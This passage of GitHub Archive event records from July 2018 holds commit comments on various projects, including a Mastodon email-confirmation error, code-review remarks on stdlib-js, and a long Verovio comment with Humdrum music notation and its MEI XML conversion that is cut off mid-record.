bundle[3530]: [249a4c69-affe-403b-812b-3b767c5119de] app/models/user.rb:173:in `confirm'\r\n\r\n\r\n```\r\n_insert shrug emoji here_\r\n\r\nThis occurs when performing an email address change and a notification email is sent.. I'm unable to activate the new email address and get redirected to the happy \"We're sorry, but something went wrong on our end.\"\r\n\r\n"}},"created_at":"2018-07-21T00:38:11Z"}
{"id":"7997742141","type":"CommitCommentEvent","actor":{"login":"siggi2git"},"repo":{"name":"Leafpub/leafpub"},"payload":{"comment":{"id":29786239,"position":null,"line":null,"path":null,"commit_id":"04633cad2ed93da0965897d915dba59a5124a2bc","created_at":"2018-07-21T00:38:14Z","updated_at":"2018-07-21T00:38:14Z","author_association":"NONE","body":"User wird nicht gelöscht ... (dev version, php7.2 ubuntu) "}},"created_at":"2018-07-21T00:38:14Z"}
{"id":"7997744209","type":"CommitCommentEvent","actor":{"login":"Aboodi19900"},"repo":{"name":"Aboodi19900/Abood-T"},"payload":{"comment":{"id":29786242,"position":null,"line":null,"path":null,"commit_id":"752c7c801b6ee01f40f95852f6d21e768042ee21","created_at":"2018-07-21T00:39:36Z","updated_at":"2018-07-21T00:39:36Z","author_association":"OWNER","body":"https://github.com/Aboodi19900/Abood-T/commit/752c7c801b6ee01f40f95852f6d21e768042ee21#diff-04c6e90faac2675aa89e2176d2eec7d8"}},"created_at":"2018-07-21T00:39:36Z"}
{"id":"7997744610","type":"CommitCommentEvent","actor":{"login":"Aboodi19900"},"repo":{"name":"Aboodi19900/Abood-T"},"payload":{"comment":{"id":29786243,"position":1,"line":1,"path":"README.md","commit_id":"752c7c801b6ee01f40f95852f6d21e768042ee21","created_at":"2018-07-21T00:39:50Z","updated_at":"2018-07-21T00:39:50Z","author_association":"OWNER","body":"Aboodi19900@hotmail.com "}},"created_at":"2018-07-21T00:39:50Z"}
{"id":"7997744909","type":"CommitCommentEvent","actor":{"login":"AlexWaskow"},"repo":{"name":"educagit/conceitos-basicos-AlexWaskow"},"payload":{"comment":{"id":29786245,"position":null,"line":null,"path":null,"commit_id":"2617d992fc64842aac8084978bd2ae3d32c026c5","created_at":"2018-07-21T00:40:01Z","updated_at":"2018-07-21T00:40:01Z","author_association":"COLLABORATOR","body":"Boa noite professor, não entendi algumas etapas, e não consegui falar com os colegas, eu tenho que criar um repositório? Posso dar qualquer nome pra esse repositório? Os arquivos devem ser criados dentro de alguma pasta específica no repositório? "}},"created_at":"2018-07-21T00:40:01Z"}
{"id":"7997744965","type":"CommitCommentEvent","actor":{"login":"Aboodi19900"},"repo":{"name":"Aboodi19900/Abood-T"},"payload":{"comment":{"id":29786246,"position":1,"line":1,"path":"README.md","commit_id":"752c7c801b6ee01f40f95852f6d21e768042ee21","created_at":"2018-07-21T00:40:02Z","updated_at":"2018-07-21T00:40:02Z","author_association":"OWNER","body":"Aboodi19900@hotmail.com "}},"created_at":"2018-07-21T00:40:02Z"}
{"id":"7997745985","type":"CommitCommentEvent","actor":{"login":"farazrahman"},"repo":{"name":"farazrahman/Investment_analysis"},"payload":{"comment":{"id":29786247,"position":null,"line":null,"path":null,"commit_id":"1099bd95d26fa21a5caef9ed4dfeb8685beefe83","created_at":"2018-07-21T00:40:38Z","updated_at":"2018-07-21T00:40:38Z","author_association":"OWNER","body":"Understanding the global trends in investments in order to make effective investment decisions."}},"created_at":"2018-07-21T00:40:38Z"}
{"id":"7997746243","type":"CommitCommentEvent","actor":{"login":"jebuskrust"},"repo":{"name":"tootsuite/mastodon"},"payload":{"comment":{"id":29786248,"position":4,"line":19,"path":"app/validators/email_mx_validator.rb","commit_id":"32a4b524fb95799cfebd9a9e76ef42019d22c5f1","created_at":"2018-07-21T00:40:49Z","updated_at":"2018-07-21T00:40:49Z","author_association":"NONE","body":"🥇 "}},"created_at":"2018-07-21T00:40:49Z"}
{"id":"7997750209","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29786257,"position":null,"line":null,"path":null,"commit_id":"e8bf29d1240858164b8b40540708c52f48912143","created_at":"2018-07-21T00:43:35Z","updated_at":"2018-07-21T00:43:35Z","author_association":"COLLABORATOR","body":"- Experiments removed: `VOICE_QUALITY: \"2018-03_voice-quality\"`, `VOICE_QUALITY_SPECIFIC_USERS: \"2018-04_voice-quality-specific-users\"`\r\n```js\r\nt.OverlayWidgetLayoutTypes = {\r\n    DOCKED: null,\r\n    PINNED: null,\r\n    POPPED: null\r\n}\r\n```\r\n\r\n![image](https://user-images.githubusercontent.com/18150845/43030404-d9100858-8c8f-11e8-9095-44a789b81734.png)\r\n\r\n## New strings\r\n- `OVERLAY_WIDGET_SHOW_IN_GAME: \"Show window in game\"`\r\n- `OVERLAY_WIDGET_HIDE_IN_GAME: \"Hide window in game\"`"}},"created_at":"2018-07-21T00:43:35Z"}
{"id":"7997750653","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29786259,"position":28,"line":28,"path":"lib/node_modules/@stdlib/array/shape/lib/index.js","commit_id":"094891e63a1a18e41c052653780380e07f7444d1","created_at":"2018-07-21T00:43:54Z","updated_at":"2018-07-21T00:43:54Z","author_association":"MEMBER","body":"This example is missing the `arr` definition."}},"created_at":"2018-07-21T00:43:54Z"}
{"id":"7997751170","type":"CommitCommentEvent","actor":{"login":"coddec"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29786260,"position":null,"line":null,"path":null,"commit_id":"1fd152f4282af25d133a57509a2321d695bfe443","created_at":"2018-07-21T00:44:15Z","updated_at":"2018-07-21T00:44:15Z","author_association":"MEMBER","body":"👍 👍 👍"}},"created_at":"2018-07-21T00:44:15Z"}
{"id":"7997752031","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29786263,"position":35,"line":35,"path":"lib/node_modules/@stdlib/array/shape/lib/index.js","commit_id":"094891e63a1a18e41c052653780380e07f7444d1","created_at":"2018-07-21T00:44:53Z","updated_at":"2018-07-21T00:44:53Z","author_association":"MEMBER","body":"I think this example is quite useful, as it demonstrates the behavior when not all of the arrays are of the same length. It would be useful to have in the `README.md`, too."}},"created_at":"2018-07-21T00:44:53Z"}
{"id":"7997753149","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29786268,"position":28,"line":28,"path":"lib/node_modules/@stdlib/array/shape/lib/index.js","commit_id":"094891e63a1a18e41c052653780380e07f7444d1","created_at":"2018-07-21T00:45:37Z","updated_at":"2018-07-21T00:45:37Z","author_association":"MEMBER","body":"Fixed."}},"created_at":"2018-07-21T00:45:37Z"}
{"id":"7997753312","type":"CommitCommentEvent","actor":{"login":"beginor"},"repo":{"name":"nhibernate/NHibernate.AspNetCore.Identity"},"payload":{"comment":{"id":29786270,"position":4,"line":4,"path":".vscode/launch.json","commit_id":"9c6d2340969d048bffbd0ecf56ea3707abb141a1","created_at":"2018-07-21T00:45:44Z","updated_at":"2018-07-21T00:45:44Z","author_association":"CONTRIBUTOR","body":"`.vscode` directory is ignored by `.gitignore` file, only `tasks.json` and `launch.json` are included, other files like user settings are not included in git."}},"created_at":"2018-07-21T00:45:44Z"}
{"id":"7997754171","type":"CommitCommentEvent","actor":{"login":"cormacrelf"},"repo":{"name":"cormacrelf/angular-skyhook"},"payload":{"comment":{"id":29786273,"position":null,"line":null,"path":null,"commit_id":"c010dd5284553e5a34d6fb9f66ec6cc1e837fd1f","created_at":"2018-07-21T00:46:21Z","updated_at":"2018-07-21T00:46:21Z","author_association":"OWNER","body":"I’m not fussed about the Lerna paths, but it was way too hard to find what the problem was.\r\n\r\nThe dependabot UI never told me there was a problem, it just took ages (like an hour possibly retrying) to report that it had checked anything, and never generated a PR. So it actually looked like you guys had capacity issues for a while, or my jobs were never getting queued. I enabled it for another repo with the same protractor version, to see if it should be making PRs, and yes, it should have been.\r\n\r\nI actually gave up the first time — used GK, which still hasn’t managed to make monorepos or lockfiles work well, so I came back — so the whole cycle of finding this bug was more than a month.\r\n\r\nI downloaded and built dependabot-core, and used some scripts to see what the problems were. The script pulled up a long stack trace and then an invalid GitHub API URI (`*skyhook*`).\r\n\r\nAll this uncertainty! Bubble up your errors to the UI. Don’t even need to show me the logs or traces, just tell me that something went wrong so I can start trying to reproduce locally or file an issue about it."}},"created_at":"2018-07-21T00:46:21Z"}
{"id":"7997755280","type":"CommitCommentEvent","actor":{"login":"charris"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29786275,"position":null,"line":null,"path":null,"commit_id":"cd530708178788aa3f6edb2df4acbc1daf29af69","created_at":"2018-07-21T00:47:07Z","updated_at":"2018-07-21T00:47:07Z","author_association":"CONTRIBUTOR","body":"Reverted by https://github.com/MacPython/numpy-wheels/commit/3d0da6b6acac050e67509ed6a469dba1602b1890"}},"created_at":"2018-07-21T00:47:07Z"}
{"id":"7997755856","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29786277,"position":35,"line":35,"path":"lib/node_modules/@stdlib/array/shape/lib/index.js","commit_id":"094891e63a1a18e41c052653780380e07f7444d1","created_at":"2018-07-21T00:47:27Z","updated_at":"2018-07-21T00:47:27Z","author_association":"MEMBER","body":"Okay."}},"created_at":"2018-07-21T00:47:27Z"}
{"id":"7997756363","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29786278,"position":35,"line":35,"path":"lib/node_modules/@stdlib/array/shape/lib/index.js","commit_id":"094891e63a1a18e41c052653780380e07f7444d1","created_at":"2018-07-21T00:47:44Z","updated_at":"2018-07-21T00:47:44Z","author_association":"MEMBER","body":"Awesome, thanks!"}},"created_at":"2018-07-21T00:47:44Z"}
{"id":"7997760297","type":"CommitCommentEvent","actor":{"login":"eyqs"},"repo":{"name":"eyqs/ndb"},"payload":{"comment":{"id":29786286,"position":7,"line":126,"path":"front_end/ndb/NdbMain.js","commit_id":"837cd6477300a62638b25d809f131dbe9a0198bf","created_at":"2018-07-21T00:50:28Z","updated_at":"2018-07-21T00:50:28Z","author_association":"OWNER","body":"Done."}},"created_at":"2018-07-21T00:50:28Z"}
{"id":"7997760402","type":"CommitCommentEvent","actor":{"login":"eyqs"},"repo":{"name":"eyqs/ndb"},"payload":{"comment":{"id":29786287,"position":82,"line":306,"path":"front_end/ndb/NdbMain.js","commit_id":"837cd6477300a62638b25d809f131dbe9a0198bf","created_at":"2018-07-21T00:50:33Z","updated_at":"2018-07-21T00:50:33Z","author_association":"OWNER","body":"Done."}},"created_at":"2018-07-21T00:50:33Z"}
{"id":"7997761006","type":"CommitCommentEvent","actor":{"login":"eyqs"},"repo":{"name":"eyqs/ndb"},"payload":{"comment":{"id":29786294,"position":24,"line":24,"path":"front_end/ndb_ui/CloudDebuggees.js","commit_id":"837cd6477300a62638b25d809f131dbe9a0198bf","created_at":"2018-07-21T00:50:59Z","updated_at":"2018-07-21T00:50:59Z","author_association":"OWNER","body":"Sounds good. I just copied the code over from your NodeProcesses."}},"created_at":"2018-07-21T00:50:59Z"}
{"id":"7997761399","type":"CommitCommentEvent","actor":{"login":"eyqs"},"repo":{"name":"eyqs/ndb"},"payload":{"comment":{"id":29786298,"position":5,"line":16,"path":"package.json","commit_id":"837cd6477300a62638b25d809f131dbe9a0198bf","created_at":"2018-07-21T00:51:15Z","updated_at":"2018-07-21T00:51:15Z","author_association":"OWNER","body":"These packages don't exist yet. They should be launched soon(tm)."}},"created_at":"2018-07-21T00:51:15Z"}
{"id":"7997762448","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29786300,"position":null,"line":null,"path":null,"commit_id":"170767de1322e10ab0e87396bb409c415256cf16","created_at":"2018-07-21T00:52:01Z","updated_at":"2018-07-21T00:52:01Z","author_association":"CONTRIBUTOR","body":"This commit is related to issue https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/135\r\n\r\nThe commit changes the method that multiple slurs are attached to chords in the Humdrum-to-MEI converter.  Previous multiple slurs were attached to chords, but the new implementation attaches the slurs to individual notes when there is more than one slur attached to a chord.  If there is a single slur connecting to chords, they are still attached to chords.\r\n\r\nNote assignment for slurs is done with this algorithm:  The first slur is attached to the lowest note in the chord, the second slur is attached to the highest note in the chord.  When there are more than two slurs attached to the chord, the notes are assigned next to the second lowest, and then the second highest, and so on.   The order of the notes in the chord as given in the data is ignored when assigning slurs to the notes.\r\n\r\n\r\nRendered example:\r\n\r\n<img width=\"1388\" alt=\"screen shot 2018-07-21 at 2 43 57 am\" src=\"https://user-images.githubusercontent.com/3487289/43030408-de947d0e-8c8f-11e8-85af-f0b197d2b01b.png\">\r\n<img width=\"1426\" alt=\"screen shot 2018-07-21 at 2 44 08 am\" src=\"https://user-images.githubusercontent.com/3487289/43030409-e0e6696e-8c8f-11e8-9588-2129fef0c7b8.png\">\r\n<img width=\"1386\" alt=\"screen shot 2018-07-21 at 2 44 18 am\" src=\"https://user-images.githubusercontent.com/3487289/43030411-e8fedb54-8c8f-11e8-8d2e-d8be57cdcf99.png\">\r\n\r\nThe examples that are marked with `overlap` should eventually probably be adjusted in verovio, so that automatic layout placement of slurs do not overlap slurs.  When the stem directions of the two chords are opposite, the overlapping is more common.\r\n\r\nHere is the Humdrum input for the example:\r\n\r\n```\r\n**kern\t**vdata\t**vdata\t**text\r\n*clefG2\t*color:#ccc\t*color:#aaa\t*color:#ddd\r\n=1\t=1\t=1\t=1\r\n!!LO:TX:a:color=red:t=Single notes with 1 slur connecting them\r\n2c\tslurs:\tattachment:\tcomments:\r\n=2\t=2\t=2\t=2\r\n(4c\t1\tnote\t.\r\n4d)\t.\t.\t.\r\n=3\t=3\t=3\t=3\r\n(4aa\t1\tnote\t.\r\n4gg)\t.\t.\t.\r\n=4\t=4\t=4\t=4\r\n(4aa\t1\tnote\t.\r\n4c)\t.\t.\t.\r\n=5\t=5\t=5\t=5\r\n(4c\t1\tnote\t.\r\n4aa)\t.\t.\t.\r\n=6||\t=6||\t=6||\t=6||\r\n\r\n\r\n!!LO:TX:a:color=red:t=Two-note chords with 1 and 2 slurs\r\n(4c e\t1\tchord\t.\r\n4d f)\t.\t.\t.\r\n=7\t=7\t=7\t=7\r\n(4aa ff\t1\tchord\t.\r\n4gg ee)\t.\t.\t.\r\n=8\t=8\t=8\t=8\r\n(4aa ff\t1\tchord\t.\r\n4c e)\t.\t.\t.\r\n=9\t=9\t=9\t=9\r\n(4c e\t1\tchord\t.\r\n4aa ff)\t.\t.\t.\r\n\r\n\r\n=10\t=10\t=10\t=10\r\n((4c e\t2\tchord\t.\r\n4d f))\t.\t.\t.\r\n=11\t=11\t=11\t=11\r\n((4aa ff\t2\tchord\t.\r\n4gg ee))\t.\t.\t.\r\n=12\t=12\t=12\t=12\r\n((4aa ff\t2\tchord\toverlap\r\n4c e))\t.\t.\t.\r\n=13\t=13\t=13\t=13\r\n((4c e\t2\tchord\toverlap\r\n4aa ff))\t.\t.\t.\r\n\r\n=14||\t=14||\t=14||\t=14||\r\n!!LO:TX:a:color=red:t=Three-note chords with 1, 2 and 3 slurs\r\n(4c e g\t1\tchord\t.\r\n4d f a)\t.\t.\t.\r\n=15\t=15\t=15\t=15\r\n(4aa ff dd\t1\tchord\t.\r\n4gg ee cc)\t.\t.\t.\r\n=16\t=16\t=16\t=16\r\n(4aa ff dd\t1\tchord\t.\r\n4c e g)\t.\t.\t.\r\n=17\t=17\t=17\t=17\r\n(4c e g\t1\tchord\t.\r\n4aa ff dd)\t.\t.\t.\r\n\r\n=18\t=18\t=18\t=18\r\n((4c e g\t2\tnote\t.\r\n4d f a))\t.\t.\t.\r\n=19\t=19\t=19\t=19\r\n((4aa ff dd\t2\tnote\t.\r\n4gg ee cc))\t.\t.\t.\r\n=20\t=20\t=20\t=20\r\n((4aa ff dd\t2\tnote\toverlap\r\n4c e g))\t.\t.\t.\r\n=21\t=21\t=21\t=21\r\n((4c e g\t2\tnote\toverlap\r\n4aa ff dd))\t.\t.\t.\r\n\r\n=22\t=22\t=22\t=22\r\n(((4c e g\t3\tnote\toverlap\r\n4d f a)))\t.\t.\t.\r\n=23\t=23\t=23\t=23\r\n(((4aa ff dd\t3\tnote\toverlap\r\n4gg ee cc)))\t.\t.\t.\r\n=24\t=24\t=24\t=24\r\n(((4aa ff dd\t3\tnote\toverlap\r\n4c e g)))\t.\t.\t.\r\n=25\t=25\t=25\t=25\r\n(((4c e g\t3\tnote\toverlap\r\n4aa ff dd)))\t.\t.\t.\r\n\r\n==\t==\t==\t==\r\n\r\n*^\t*\t*\t*\r\n!!LO:TX:a:color=red:t=First voice, single notes with 1 slur\r\n2c\t1r\tslurs:\tattachment:\tcomments:\r\n(4c\t.\t1\tnote\t.\r\n4d)\t.\t.\t.\t.\r\n=26\t=26\t=26\t=26\t=26\r\n(4aa\t2r\t1\tnote\t.\r\n4gg)\t.\t.\t.\t.\r\n=27\t=27\t=27\t=27\t=27\r\n(4aa\t2r\t1\tnote\t.\r\n4c)\t.\t.\t.\t.\r\n=28\t=28\t=28\t=28\t=28\r\n(4c\t2r\t1\tnote\t.\r\n4aa)\t.\t.\t.\t.\r\n=29||\t=29||\t=29||\t=29||\t=29||\r\n\r\n\r\n!!LO:TX:a:color=red:t=First voice, two-note chords with 1 and 2 slurs\r\n(4c e\t2r\t1\tchord\t.\r\n4d f)\t.\t.\t.\t.\r\n=30\t=30\t=30\t=30\t=30\r\n(4aa ff\t2r\t1\tchord\t.\r\n4gg ee)\t.\t.\t.\t.\r\n=31\t=31\t=31\t=31\t=31\r\n(4aa ff\t2r\t1\tchord\t.\r\n4c e)\t.\t.\t.\t.\r\n=32\t=32\t=32\t=32\t=32\r\n(4c e\t2r\t1\tchord\t.\r\n4aa ff)\t.\t.\t.\t.\r\n\r\n\r\n=33\t=33\t=33\t=33\t=33\r\n((4c e\t2r\t2\tchord\toverlap\r\n4d f))\t.\t.\t.\t.\r\n=34\t=34\t=34\t=34\t=34\r\n((4aa ff\t2r\t2\tchord\toverlap\r\n4gg ee))\t.\t.\t.\t.\r\n=35\t=35\t=35\t=35\t=35\r\n((4aa ff\t2r\t2\tchord\toverlap\r\n4c e))\t.\t.\t.\t.\r\n=36\t=36\t=36\t=36\t=36\r\n((4c e\t2r\t2\tchord\toverlap\r\n4aa ff))\t.\t.\t.\t.\r\n\r\n=37||\t=37||\t=37||\t=37||\t=37||\r\n!!LO:TX:a:color=red:t=First voice, three-note chords with 1, 2 and 3 slurs\r\n(4c e g\t2r\t1\tchord\t.\r\n4d f a)\t.\t.\t.\t.\r\n=38\t=38\t=38\t=38\t=38\r\n(4aa ff dd\t2r\t1\tchord\t.\r\n4gg ee cc)\t.\t.\t.\t.\r\n=39\t=39\t=39\t=39\t=39\r\n(4aa ff dd\t2r\t1\tchord\t.\r\n4c e g)\t.\t.\t.\t.\r\n=40\t=40\t=40\t=40\t=40\r\n(4c e g\t2r\t1\tchord\t.\r\n4aa ff dd)\t.\t.\t.\t.\r\n\r\n=41\t=41\t=41\t=41\t=41\r\n((4c e g\t2r\t2\tnote\toverlap\r\n4d f a))\t.\t.\t.\t.\r\n=42\t=42\t=42\t=42\t=42\r\n((4aa ff dd\t2r\t2\tnote\toverlap\r\n4gg ee cc))\t.\t.\t.\t.\r\n=43\t=43\t=43\t=43\t=43\r\n((4aa ff dd\t2r\t2\tnote\toverlap\r\n4c e g))\t.\t.\t.\t.\r\n=44\t=44\t=44\t=44\t=44\r\n((4c e g\t2r\t2\tnote\toverlap\r\n4aa ff dd))\t.\t.\t.\t.\r\n\r\n=45\t=45\t=45\t=45\t=45\r\n(((4c e g\t2r\t3\tnote\toverlap\r\n4d f a)))\t.\t.\t.\t.\r\n=46\t=46\t=46\t=46\t=46\r\n(((4aa ff dd\t2r\t3\tnote\toverlap\r\n4gg ee cc)))\t.\t.\t.\t.\r\n=47\t=47\t=47\t=47\t=47\r\n(((4aa ff dd\t2r\t3\tnote\toverlap\r\n4c e g)))\t.\t.\t.\t.\r\n=48\t=48\t=48\t=48\t=48\r\n(((4c e g\t2r\t3\tnote\toverlap\r\n4aa ff dd)))\t.\t.\t.\t.\r\n*v\t*v\t*\t*\t*\r\n==\t==\t==\t==\r\n\r\n\r\n*^\t*\t*\t*\r\n!!LO:TX:a:color=red:t=Second voice, single notes with 1 slur connecting them\r\n1r\t2c\tslurs:\tattachment:\tcomments:\r\n.\t(4c\t1\tnote\t.\r\n.\t4d)\t.\t.\t.\r\n=49\t=49\t=49\t=49\t=49\r\n2r\t(4aa\t1\tnote\t.\r\n.\t4gg)\t.\t.\t.\r\n=50\t=50\t=50\t=50\t=50\r\n2r\t(4aa\t1\tnote\t.\r\n.\t4c)\t.\t.\t.\r\n=51\t=51\t=51\t=51\t=51\r\n2r\t(4c\t1\tnote\t.\r\n.\t4aa)\t.\t.\t.\r\n=52||\t=52||\t=52||\t=52||\t=52||\r\n\r\n\r\n!!LO:TX:a:color=red:t=Second voice, two-note chords with 1 and 2 slurs\r\n2r\t(4c e\t1\tchord\t.\r\n.\t4d f)\t.\t.\t.\r\n=53\t=53\t=53\t=53\t=53\r\n2r\t(4aa ff\t1\tchord\t.\r\n.\t4gg ee)\t.\t.\t.\r\n=54\t=54\t=54\t=54\t=54\r\n2r\t(4aa ff\t1\tchord\t.\r\n.\t4c e)\t.\t.\t.\r\n=55\t=55\t=55\t=55\t=55\r\n2r\t(4c e\t1\tchord\t.\r\n.\t4aa ff)\t.\t.\t.\r\n\r\n\r\n=56\t=56\t=56\t=56\t=56\r\n2r\t((4c e\t2\tchord\toverlap\r\n.\t4d f))\t.\t.\t.\r\n=57\t=57\t=57\t=57\t=57\r\n2r\t((4aa ff\t2\tchord\toverlap\r\n.\t4gg ee))\t.\t.\t.\r\n=58\t=58\t=58\t=58\t=58\r\n2r\t((4aa ff\t2\tchord\toverlap\r\n.\t4c e))\t.\t.\t.\r\n=59\t=59\t=59\t=59\t=59\r\n2r\t((4c e\t2\tchord\toverlap\r\n.\t4aa ff))\t.\t.\t.\r\n\r\n=60||\t=60||\t=60||\t=60||\t=60||\r\n!!LO:TX:a:color=red:t=Second voice, three-note chords with 1, 2 and 3 slurs\r\n2r\t(4c e g\t1\tchord\t.\r\n.\t4d f a)\t.\t.\t.\r\n=61\t=61\t=61\t=61\t=61\r\n2r\t(4aa ff dd\t1\tchord\t.\r\n.\t4gg ee cc)\t.\t.\t.\r\n=62\t=62\t=62\t=62\t=62\r\n2r\t(4aa ff dd\t1\tchord\t.\r\n.\t4c e g)\t.\t.\t.\r\n=63\t=63\t=63\t=63\t=63\r\n2r\t(4c e g\t1\tchord\t.\r\n.\t4aa ff dd)\t.\t.\t.\r\n\r\n=64\t=64\t=64\t=64\t=64\r\n2r\t((4c e g\t2\tnote\toverlap\r\n.\t4d f a))\t.\t.\t.\r\n=65\t=65\t=65\t=65\t=65\r\n2r\t((4aa ff dd\t2\tnote\toverlap\r\n.\t4gg ee cc))\t.\t.\t.\r\n=66\t=66\t=66\t=66\t=66\r\n2r\t((4aa ff dd\t2\tnote\toverlap\r\n.\t4c e g))\t.\t.\t.\r\n=67\t=67\t=67\t=67\t=67\r\n2r\t((4c e g\t2\tnote\toverlap\r\n.\t4aa ff dd))\t.\t.\t.\r\n\r\n=68\t=68\t=68\t=68\t=68\r\n2r\t(((4c e g\t3\tnote\toverlap\r\n.\t4d f a)))\t.\t.\t.\r\n=69\t=69\t=69\t=69\t=69\r\n2r\t(((4aa ff dd\t3\tnote\toverlap\r\n.\t4gg ee cc)))\t.\t.\t.\r\n=70\t=70\t=70\t=70\t=70\r\n2r\t(((4aa ff dd\t3\tnote\toverlap\r\n.\t4c e g)))\t.\t.\t.\r\n=71\t=71\t=71\t=71\t=71\r\n2r\t(((4c e g\t3\tnote\toverlap\r\n.\t4aa ff dd)))\t.\t.\t.\r\n*v\t*v\t*\t*\t*\r\n==\t==\t==\t==\r\n\r\n*-\t*-\t*-\t*-\r\n```\r\n\r\nAnd here is the MEI conversion:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-21T02:47:25\" version=\"2.0.0-dev-a8ecf52-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001073274016\">\r\n                <score xml:id=\"score-0000001801235759\">\r\n                    <scoreDef xml:id=\"scoredef-0000001854691403\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000000328741438\">\r\n                            <staffDef xml:id=\"staffdef-0000001424291142\" clef.shape=\"G\" clef.line=\"2\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000002134520628\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L3\" n=\"1\">\r\n                            <staff xml:id=\"staff-L3F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L3F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L5F1\" dur=\"2\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L5F2\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L5F2\">slurs:</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L5F3\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L5F3\">attachment:</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L5F4\" color=\"#ddd\" n=\"3\">\r\n                                            <syl xml:id=\"syl-L5F4\">comments:</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L5F1\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000000525067709\" fontstyle=\"normal\">Single notes with 1 slur connecting them</rend>\r\n                            </dir>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L6\" n=\"2\">\r\n                            <staff xml:id=\"staff-L6F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L6F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L7F1\" dur=\"4\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L7F2\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L7F2\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L7F3\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L7F3\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L8F1\" dur=\"4\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L7F1-L8F1N1\" staff=\"1\" startid=\"#note-L7F1\" endid=\"#note-L8F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L9\" n=\"3\">\r\n                            <staff xml:id=\"staff-L9F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L9F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L10F1\" dur=\"4\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L10F2\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L10F2\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L10F3\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L10F3\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L11F1\" dur=\"4\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L10F1-L11F1N1\" staff=\"1\" startid=\"#note-L10F1\" endid=\"#note-L11F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L12\" n=\"4\">\r\n                            <staff xml:id=\"staff-L12F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L12F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L13F1\" dur=\"4\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L13F2\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L13F2\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L13F3\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L13F3\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note 